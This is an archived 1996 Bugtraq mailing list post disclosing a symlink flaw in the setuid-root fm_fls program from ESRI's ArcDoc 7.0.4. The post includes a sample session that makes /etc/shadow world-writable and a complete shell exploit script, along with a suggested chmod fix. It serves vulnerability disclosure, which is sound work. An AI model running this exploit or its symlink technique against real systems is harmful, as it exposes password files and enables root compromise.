Bugtraq mailing list archives
Security problem in ESRI's ArcDoc 7.0.4
From: jwa () nbs nau edu (James W. Abendschan)
Date: Thu, 23 May 1996 21:21:46 -0700
*** GIS & ESRI/ARC/Info shops take note! *** The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4) contains a bug which allows us to (a) add somewhat arbitrary data to any file and (b) changes the permissions of that file to rw-rw-rw-. fm_fls is setuid root. When fm_fls is executed, it opens up a logfile -- the default location for this file is /tmp/fm_fls.log. Unfortunately, it doesn't check if this file already exists or if this file has any symlinks attached to it. If for some reason fm_fls gets bad arguments, it will write these bad arguments to the logfile, chown the file to root, give the file 666 permissions, and exit. If we make a link from this file to an unreadable file, we can both append the contents of the logfile into the unreadable file and gain world rw access to the file. Sample run:
ecosys:~jwa/Security/Projects/r00tin> id uid=200(jwa) gid=107(cpin) ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow -rw------- 1 root other 1851 May 23 20:22 /etc/shadow ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot fm.sploit of /etc/shadow yields: -rw-rw-rw- 1 root other 2011 May 23 20:38 /etc/shadow ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow mpm:xxxxxxxxxxxxx:6445:::::: ebp:xxxxxxxxxxxxx:6445:::::: sml:xxxxxxxxxxxxx:6445:::::: 1996/05/23-20:38:32 BG woot ecosys # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot ecosys:~jwa/Security/Projects/r00tin>
Note the additional lines appended to the target file (in this case, /etc/shadow.) To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`. I don't yet know the effects of removing the suid bit on fm_fls; I'd like to hear feedback on this. I've seen fm_fls distributed with other applications -- perhaps the bug is not specific to ARC/Info? Comments are welcome. James #!/bin/sh # # exploit a bug in the fm_fls application as distributed with ARC/Info's # ArcDoc (and others?) to give us rw access to any file. # # fix: chmod 555 `which fm_fls` # # tested on Solaris 2.5 w/ ArcDoc 7.0.4 # # James Abendschan jwa () nbs nau edu 23 May 1996 # # full path to the fm_fls executable FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls" LOGFILE=/tmp/fm_fls.log TMP=/tmp/exploit.$$ UNREADABLE=$1 if [ $# != 1 ] then echo "usage: `basename $0` filename" exit 1 fi rm -f $LOGFILE if [ -f $LOGFILE ] then echo "tried to remove $LOGFILE, but it still exists! Exploit won't work." exit 1 fi # since fm_fls will complain if we link to a logfile too "far away" # from the original file, we just do a dual link.. ln -s $UNREADABLE $TMP ln -s $TMP $LOGFILE $FM_FLS woot echo "`basename $0` of $UNREADABLE yields:" ls -l $UNREADABLE # all done, clean up. rm -f $TMP $LOGFILE exit 0 -- James W. Abendschan Email: jwa () nbs nau edu UNIX Systems Programmer/Administrator Phone: (520) 556-7466 x238 Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516
Current thread:
- Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 23)
- Re: Security problem in ESRI's ArcDoc 7.0.4 Andrew Raphael (May 24)
- <Possible follow-ups>
- Re: Security problem in ESRI's ArcDoc 7.0.4 Sven.Wijk (May 24)
- Re: Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 24)
- Re: Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 24)